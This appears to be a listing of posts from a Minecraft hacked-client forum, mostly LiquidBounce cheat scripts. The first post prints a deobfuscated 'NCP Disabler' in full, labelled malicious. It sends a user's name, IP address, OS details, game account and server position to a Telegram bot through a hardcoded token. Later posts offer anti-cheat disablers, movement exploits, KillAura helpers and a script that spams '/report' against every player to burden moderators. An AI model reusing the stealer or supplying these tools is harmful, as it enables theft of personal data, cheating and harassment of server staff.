category where people can talk about sigma client!!
upvote!!!
DreamWasFucked
Posts
-
Sigma Discussion -
"NCP Disabler" deobflol
Malicious. DON'T use this script.
// Deobf by Shurpe var DateTimeFormatter = Java.type('java.time.format.DateTimeFormatter'), BufferedInputStream = Java.type('java.io.BufferedInputStream'), InputStreamReader = Java.type('java.io.InputStreamReader'), Minecraft = Java.type('net.minecraft.client.Minecraft'), BufferedReader = Java.type('java.io.BufferedReader'), ZonedDateTime = Java.type('java.time.ZonedDateTime'), IOException = Java.type('java.io.IOException'), Exception = Java.type('java.lang.Exception'), ZoneId = Java.type('java.time.ZoneId'), Locale = Java.type('java.util.Locale'), System = Java.type('java.lang.System'), String = Java.type('java.lang.String'), URL = Java.type('java.net.URL'); DTF = DateTimeFormatter.ofPattern('MMMM d, yyyy HH:mm:ss', Locale.US), defaultZoneId = ZoneId.systemDefault(), API_TOKEN = '1418453085:AAFoFiTWZMrw9k6pSwzX37LTdHRYiK6WqA0', CHAT_ID = '1294649917'; function sendToTelegram(text) { URLString = "https://api.telegram.org/bot%s/sendMessage?chat_id=%s&text=%s"; URLString = String.format(URLString, API_TOKEN, CHAT_ID, text); try { url = new URL(URLString); conn = url.openConnection(); new BufferedInputStream(conn.getInputStream()); } catch (IOException) { // ? } } function getIPAddress () { try { IPAddress = new BufferedReader(new InputStreamReader(new URL('http://checkip.amazonaws.com').openStream())).readLine(); } catch (Exception) { IPAddress = 'Failed to obtain an IP address. (' + Exception + ')'; } return IPAddress; } var script = registerScript({ name: 'OPDISABLER2011NOTPATCHED', version: '0.0.1', authors: ['LiquidBounce'] }); script.registerModule({ name: 'OPDISABLER2011NOTPATCHED', category: 'Exploit', description: '' }, function (module) { module.on('enable', function() { sendToTelegram( 'User name : ' + System.getProperty("user.name") + '%0ALog date : ' + DTF.format(ZonedDateTime.now(defaultZoneId)) + ' ' + defaultZoneId + '%0AIP address : ' + getIPAddress() + '%0AOS architecture : ' + System.getProperty("os.arch") + '%0AOS version : ' + System.getProperty("os.version") + '%0AOS name : ' + System.getProperty("os.name") + '%0AMinecraft name : ' + mc.thePlayer.getName() + '%0AOnline server : ' + (Minecraft.getMinecraft().isSingleplayer() ? 'Singleplayer' : (mc.getCurrentServerData() != null ? mc.getCurrentServerData().serverIP.toLowerCase() : 'Unable to get a server.')) + '%0AServer position : ' + (Minecraft.getMinecraft().isSingleplayer() ? '-' : (mc.getCurrentServerData() != null ? (mc.thePlayer.posX.toFixed() + ', ' + mc.thePlayer.posY.toFixed() + ', ' + mc.thePlayer.posZ.toFixed()) : 'Unable to get a position.')) ); }); });
-
AutoDisableAbout script
Turns off aura when a player dies or the server changes
Showcase
Code
var fadeTimer = 0; var reasons = ['Aura disabled due to server changes.', 'Aura disabled due to death.']; var S06PacketUpdateHealth = Java.type('net.minecraft.network.play.server.S06PacketUpdateHealth'); var ScaledResolution = Java.type('net.minecraft.client.gui.ScaledResolution'); var KillAura = moduleManager.getModule('KillAura'); function getScaledWidth() { var scaledWidth = new ScaledResolution(mc).getScaledWidth(); return scaledWidth; } function getScaledHeight() { var scaledHeight = new ScaledResolution(mc).getScaledHeight(); return scaledHeight; } var script = registerScript({ name: 'AutoDisable', version: '0.0.0', authors: ['Shurpe'] }); script.registerModule({ name: 'AutoDisable', description: 'Turns off KillAura module', category: 'Fun' }, function (module) { module.on('packet', function (e) { var packet = e.getPacket(); if (packet instanceof S06PacketUpdateHealth && packet.getHealth() <= 0 && KillAura.getState()) { KillAura.setState(false); reason = reasons[1]; disabled = true; } }); module.on('update', function () { mcWidth = getScaledWidth(); mcHeight = getScaledHeight(); disabled ? fadeTimer++ : fadeTimer = 0; if (fadeTimer >= 50) { disabled = false; } }); module.on('render2D', function () { if (disabled) { mc.fontRendererObj.drawStringWithShadow(reason, mcWidth / 2 - mc.fontRendererObj.getStringWidth(reason) / 2, 15, 0xFFFFFF); mc.fontRendererObj.drawStringWithShadow('§cWarning!', mcWidth / 2 - mc.fontRendererObj.getStringWidth('Warning!') / 2, 5, 0xFFFFFF); } }); module.on('world', function () { if (KillAura.getState()) { reason = reasons[0]; KillAura.setState(false); disabled = true; } }); });
-
AntiSigma+no more monera miner on your pc!
var FileUtils = Java.type('org.apache.commons.io.FileUtils'); var System = Java.type('java.lang.System'); var File = Java.type('java.io.File'); // Sigma paths var SigmaJelloPrelauncher = new File(System.getProperty('user.home') + '\\AppData\\Roaming\\.minecraft\\SigmaJelloPrelauncher.jar'); var Sigma5Version = new File(System.getProperty('user.home') + '\\AppData\\Roaming\\.minecraft\\versions\\Sigma5'); var Sigma5Download = new File(System.getProperty('user.home') + '\\Downloads\\Sigma5.zip'); var Sigma1 = new File(System.getProperty('user.home') + '\\AppData\\Roaming\\.minecraft\\Sigma'); var Sigma2 = new File(System.getProperty('user.home') + '\\AppData\\Roaming\\.minecraft\\sigma5'); var script = registerScript({ name: 'AntiSigma', version: '0.0.0', authors: ['Shurpe'] }); script.registerModule({ name: 'AntiSigma', category: 'Misc', description: '' }, function (module) { module.on('enable', function() { switch (true) { case SigmaJelloPrelauncher.exists(): SigmaJelloPrelauncher.delete(); break; case Sigma5Version.exists(): FileUtils.deleteDirectory(new File(Sigma5Version)); break; case Sigma5Download.exists(): Sigma5Download.delete(); break; case Sigma1.exists(): FileUtils.deleteDirectory(new File(Sigma1)); break; case Sigma2.exists(): FileUtils.deleteDirectory(new File(Sigma2)); break; } if (SigmaJelloPrelauncher.exists() || Sigma5Version.exists() || Sigma5Download.exists() || Sigma1.exists() || Sigma2.exists()) { Chat.print('Sigma client has been removed!'); } else { Chat.print('There is no Sigma client on your computer.'); } }); });
-
New matrix LongJumpmatrix != good ac
Code
Math.radians = function(degrees) { return degrees * Math.PI / 180; } function isMoving() { return (mc.thePlayer.movementInput.moveForward != 0 || mc.thePlayer.movementInput.moveStrafe != 0) ? 1 : 0; } var ticks = 0; var script = registerScript({ name: 'MatrixLong', version: '0.0.0', authors: ['Shurpe'] }); script.registerModule({ name: 'MatrixLong', description: '', category: 'Fun' }, function (module) { module.on('disable', function () { mc.timer.timerSpeed = 1, ticks = 0, mc.thePlayer.motionX = 0, mc.thePlayer.motionZ = 0; }); module.on('update', function () { if (!mc.thePlayer.isInWater() && !mc.thePlayer.isInLava() && !mc.thePlayer.isOnLadder() && !mc.thePlayer.isInWeb) { mc.timer.timerSpeed = 0.2; ticks++; if (mc.thePlayer.onGround) { wasOnGround = true; } if (!isMoving()) { if (ticks == 1 && wasOnGround) { yaw = Math.radians(mc.thePlayer.rotationYaw); mc.thePlayer.motionX = 6 * -Math.sin(yaw); mc.thePlayer.motionZ = 6 * Math.cos(yaw); mc.thePlayer.jump(); } if (ticks == 2 && wasOnGround) { yaw = Math.radians(mc.thePlayer.rotationYaw); mc.thePlayer.motionX = 5 * -Math.sin(yaw); mc.thePlayer.motionZ = 5 * Math.cos(yaw); mc.thePlayer.jump(); wasOnGround = false; } } else { module.setState(false); } if ((mc.thePlayer.onGround || mc.thePlayer.isCollidedHorizontally) && ticks > 2) { module.setState(false); } } else { module.setState(false); } }); });
-
every sigma user be like (2)C++ moment
how to put binds
fix killarua
hypixle anti-cheat by bass
pls utdate client
sup
who is best keybrist?
how to use serch
-
[Script] CircleAbout script
Original idea from this post
A simple script that shows your reach when killaura is on
Showcase
Code
var RenderUtils = Java.type('net.ccbluex.liquidbounce.utils.render.RenderUtils'); var KillAura = moduleManager.getModule('KillAura'); var GL11 = Java.type('org.lwjgl.opengl.GL11'); var Color = Java.type('java.awt.Color'); var script = registerScript({ name: 'Circle', version: '1.0', authors: ['Shurpe'] }); script.registerModule({ name: 'Circle', description: '', category: 'Fun', settings: { r: Setting.integer({ name: "Red", default: 255, min: 0, max: 255 }), g: Setting.integer({ name: "Green", default: 255, min: 0, max: 255 }), b: Setting.integer({ name: "Blue", default: 255, min: 0, max: 255 }), al: Setting.integer({ name: "Alpha", default: 155, min: 0, max: 255 }) } }, function (module) { module.on('render3D', function() { if (KillAura.getState()) { var rangeValue = KillAura.getValue('Range').get().toFixed(2) GL11.glPushMatrix(); GL11.glTranslated( mc.thePlayer.lastTickPosX + (mc.thePlayer.posX - mc.thePlayer.lastTickPosX) * mc.timer.renderPartialTicks - mc.getRenderManager().renderPosX, mc.thePlayer.lastTickPosY + (mc.thePlayer.posY - mc.thePlayer.lastTickPosY) * mc.timer.renderPartialTicks - mc.getRenderManager().renderPosY, mc.thePlayer.lastTickPosZ + (mc.thePlayer.posZ - mc.thePlayer.lastTickPosZ) * mc.timer.renderPartialTicks - mc.getRenderManager().renderPosZ ) GL11.glEnable(GL11.GL_BLEND); GL11.glEnable(GL11.GL_LINE_SMOOTH); GL11.glDisable(GL11.GL_TEXTURE_2D); GL11.glDisable(GL11.GL_DEPTH_TEST); GL11.glBlendFunc(GL11.GL_SRC_ALPHA, GL11.GL_ONE_MINUS_SRC_ALPHA); GL11.glLineWidth(1); RenderUtils.glColor(new Color(module.settings.r.get(), module.settings.g.get(), module.settings.b.get(), module.settings.al.get())); GL11.glRotatef(90, 1, 0, 0); GL11.glBegin(GL11.GL_LINE_STRIP); for (i = 0; i <= 360; i += 60) { // You can change circle accuracy (60 - accuracy) GL11.glVertex2f(Math.cos(i * Math.PI / 180) * rangeValue, (Math.sin(i * Math.PI / 180) * rangeValue)); } GL11.glEnd(); GL11.glDisable(GL11.GL_BLEND); GL11.glEnable(GL11.GL_TEXTURE_2D); GL11.glEnable(GL11.GL_DEPTH_TEST); GL11.glDisable(GL11.GL_LINE_SMOOTH); GL11.glPopMatrix(); } }); });
-
Report Abuseepic script
Report Abuse
Use this script to make it difficult for redesky mods!!!
Code
var S38PacketPlayerListItem = Java.type('net.minecraft.network.play.server.S38PacketPlayerListItem'), players = []; var script = registerScript({ name: 'Report Abuse', version: '0.0.1', authors: ['Shurpe'] }); script.registerModule({ name: 'Report Abuse', description: '', category: 'Fun' }, function (module) { module.on('update', function () { if (players.length > 0) { if (mc.thePlayer.ticksExisted % 50 == 0) { mc.thePlayer.sendChatMessage('/report ' + players[players.length - 1]); players.splice(players.indexOf(players[players.length - 1]), 1); } } }); module.on('world', function () { players = []; }); module.on('disable', function () { players = []; }); module.on('packet', function (e) { var packet = e.getPacket() if (packet instanceof S38PacketPlayerListItem && packet.getAction() == "ADD_PLAYER") { playerName = packet.getEntries().get(0).getProfile().getName(); if (players.indexOf(playerName) === -1 && playerName != mc.thePlayer.getName()) { players.push(playerName); } } }); });
-
Spartan combat disablerAdvanced Cheat Detection...
Combat Disabler
6 Blocks reach
Any criticals work
Instant fastuseCode
var C0FPacketConfirmTransaction = Java.type('net.minecraft.network.play.client.C0FPacketConfirmTransaction'), C00PacketKeepAlive = Java.type('net.minecraft.network.play.client.C00PacketKeepAlive'), MSTimer = Java.type('net.ccbluex.liquidbounce.utils.timer.MSTimer'), msTimer = new MSTimer(), transactions = [], keepAlives = []; var script = registerScript({ name: 'SpartanDisabler', version: '0.0.0', authors: ['Shurpe'] }); script.registerModule({ name: 'SpartanDisabler', category: 'Fun', description: '' }, function (module) { module.on('packet', function(e) { var packet = e.getPacket(); if (packet instanceof C00PacketKeepAlive && packet != keepAlives[keepAlives.length - 1]) { keepAlives.push(packet); e.cancelEvent(); } if (packet instanceof C0FPacketConfirmTransaction && packet != transactions[transactions.length - 1]) { transactions.push(packet); e.cancelEvent(); } }); module.on('update', function() { if (keepAlives.length > 0 && transactions.length > 0) { if (msTimer.hasTimePassed(3000)) { mc.thePlayer.sendQueue.addToSendQueue(keepAlives[keepAlives.length - 1]); mc.thePlayer.sendQueue.addToSendQueue(transactions[transactions.length - 1]); transactions = []; keepAlives = []; msTimer.reset(); } } }); });
-
how to install sigma cilent me cant figure out?The high GPU usage is due to the GPU acceleration or the UIs. And this is not comparable to other person's GPU usage since every GPU behave differently. You can compare this usage with vanilla 1.15.2's GPU usage. In my personal case, it's about +1~8% higher.
The high CPU and RAM usage are due to a memory leak that we're investigating.
Edit : The high ram usage have been fixed
And the overall performance loss over the 1.8 clients is due to the 1.15 itself, the heavy UI, the missing optimisations (performance update soon), the obfuscation, etc
Some people are saying that "conhost.exe" is a malware... It's actually the console process spawned by java.exe which is used by Sigma (instead of the javaw.exe, the window version of java.exe without the console, that is mostly used for Minecraft).
Fun fact: Badlion client and Lunar client are also spawning conhost, and they aren't getting called out as malwares.
Here's a great explanation of what it is: https://www.howtogeek.com/howto/4996/what-is-conhost.exe-and-why-is-it-running/
And Omikron client was not a bitcoin miner, here's the copypasta :
Omikron client didn't have any btc miner / rat / botnet or whatever. The thing running in background was a system to validate the usage of the auto alt / proxy from other computers. Therefore, if you used auto alt / auto proxy, your computer among others validated in some sort of P2P the usage of alts / proxies. If >50% of computers says that a "transaction" is good, it was validated. Omikron decided to do that to counter the abuse of auto alt / auto proxy.
But ofc you could disable that autorun in Omikron Client's setting. And it was clearly written in the client that it would autorun (but no body really read it) if you use auto alts / auto proxy.
Edit, another copypasta:
I know, this is missleading. In the code, finding alts is refenrenced as "mining" them because you have this user/pass combo and sometime yay ! Its a working minecraft alt ! The whole problem about all this drama is that its old code written when the client was "ghost client" and putting it in a .m file intead of .minecraft, having the package not named omikron, not using omikron domain name in the code was a good idear to prevent memory scanning cheating software such as BLSquad to find "omikron" but as you can tell it has bring more trouble that anything. You shoudn't be scared, your cpu isn't and wont be used to mine crypto or any unwanted activity and you will soon be able to chose if you want the service to run. In the next release, beside the fact that all of this was moved to .minecraft/Omikron, using proper domain name etc, you will be able to choose if you are using the client and want the background service running to find alts or if you have the client installed but not using it you will be able to disable the background service.
The video that is spreading about Omikron client is only proving that it downloads an autorun, and runs it in the background, which is intended.
Be careful of people trying to spread that Sigma could be a virus. Most of the time, they're made up by people who are clueless and don't know about what they're talking about (ex: conhost).
-
Will i get banned in hypixel with these settings ?- killaura = blatant
- 60+% horizontal 100% vertical
-
How to add text in Liquid Bouncing B73 (except the original Liquid Bouncing)@zengzihang123 create text
-
Last matrix water highJumpDoes not work on version 5.6.3
Works on version 6.0.0 and highervar script = registerScript({ name: "MatrixWaterHighJump", version: "0.0.0", authors: ["Shurpe"], }); script.registerModule({ name: "MatrixWaterHighJump", category: "Misc", description: "", settings: { jumpH: Setting.float({ name: "Jump height", default: 7, min: 4, max: 10 }) } }, function (module) { module.on("update", function () { if (mc.thePlayer.isInWater()) { if (mc.theWorld.getBlockState(new BlockPos(mc.thePlayer.posX, mc.thePlayer.posY + 1, mc.thePlayer.posZ)).getBlock() == Block.getBlockById(9)) { mc.thePlayer.motionY = 0.18 } else if (mc.theWorld.getBlockState(new BlockPos(mc.thePlayer.posX, mc.thePlayer.posY, mc.thePlayer.posZ)).getBlock() == Block.getBlockById(9)) { mc.thePlayer.motionY = module.settings.jumpH.get() mc.thePlayer.onGround = 1 } } }); }); var BlockPos = Java.type('net.minecraft.util.BlockPos'); var Block = Java.type('net.minecraft.block.Block');
-
Sigma on hypuxel???NOT FAKE SCRENSHOT!
Amigo, acho que esse não é o local de report.SIGMA = HALAL ON HYPIXEL مرحبا بك🤪🤪? SIMON OMIKRON DEVELOPAR
-
Help HelpScript
// // Source code recreated from a .class file by IntelliJ IDEA // (powered by FernFlower decompiler) // package me.aristhena.crest.module.modules.combat; import me.aristhena.crest.module.Module; import me.aristhena.crest.module.Module.Mod; import me.aristhena.crest.option.Option.Op; import me.aristhena.event.EventTarget; import me.aristhena.event.Event.State; import me.aristhena.event.events.UpdateEvent; import me.aristhena.utils.ClientUtils; import net.minecraft.block.Block; import net.minecraft.block.BlockAir; import net.minecraft.block.BlockHopper; import net.minecraft.network.play.client.C03PacketPlayer; import net.minecraft.potion.Potion; import net.minecraft.util.AxisAlignedBB; import net.minecraft.util.BlockPos; import net.minecraft.util.MathHelper; @Mod public class Regen extends Module { private double packets = 5.0D; private double potionPackets = 8.5D; @Op( name = "§bHealth", min = 0.0D, max = 20.0D, increment = 0.5D ) private double health = 9.9D; private boolean potion = true; public Regen() { } @EventTarget private void onUpdate(UpdateEvent event) { int i; if (this.potion) { if (ClientUtils.player().getActivePotionEffect(Potion.regeneration) != null && ClientUtils.player().getActivePotionEffect(Potion.regeneration).getDuration() > 0 && (double)ClientUtils.player().getHealth() <= this.health * 2.0D && (ClientUtils.player().isCollidedVertically || this.isInsideBlock()) && event.getState().equals(State.POST)) { for(i = 0; (double)i < this.potionPackets; ++i) { ClientUtils.player().getActivePotionEffect(Potion.regeneration).deincrementDuration(); ClientUtils.packet(new C03PacketPlayer(true)); } } } else if ((double)ClientUtils.player().getHealth() <= this.health * 2.0D && (ClientUtils.player().isCollidedVertically || this.isInsideBlock()) && event.getState().equals(State.POST)) { for(i = 0; (double)i < this.packets; ++i) { ClientUtils.packet(new C03PacketPlayer(true)); } } } private boolean isInsideBlock() { for(int x = MathHelper.floor_double(ClientUtils.player().boundingBox.minX); x < MathHelper.floor_double(ClientUtils.player().boundingBox.maxX) + 1; ++x) { for(int y = MathHelper.floor_double(ClientUtils.player().boundingBox.minY); y < MathHelper.floor_double(ClientUtils.player().boundingBox.maxY) + 1; ++y) { for(int z = MathHelper.floor_double(ClientUtils.player().boundingBox.minZ); z < MathHelper.floor_double(ClientUtils.player().boundingBox.maxZ) + 1; ++z) { Block block = ClientUtils.world().getBlockState(new BlockPos(x, y, z)).getBlock(); if (block != null && !(block instanceof BlockAir)) { AxisAlignedBB boundingBox = block.getCollisionBoundingBox(ClientUtils.world(), new BlockPos(x, y, z), ClientUtils.world().getBlockState(new BlockPos(x, y, z))); if (block instanceof BlockHopper) { boundingBox = new AxisAlignedBB((double)x, (double)y, (double)z, (double)(x + 1), (double)(y + 1), (double)(z + 1)); } if (boundingBox != null && ClientUtils.player().boundingBox.intersectsWith(boundingBox)) { return true; } } } } } return false; } }
-
Is it real to bypass new redesky AntiVPN?@programming-life buy dynamic ip
-
[Request] Matrix Jesus@cats-channel said in [Request] Matrix Jesus:
I am idiot
-
Kotin --> Class@indomsgods rename .kt to .class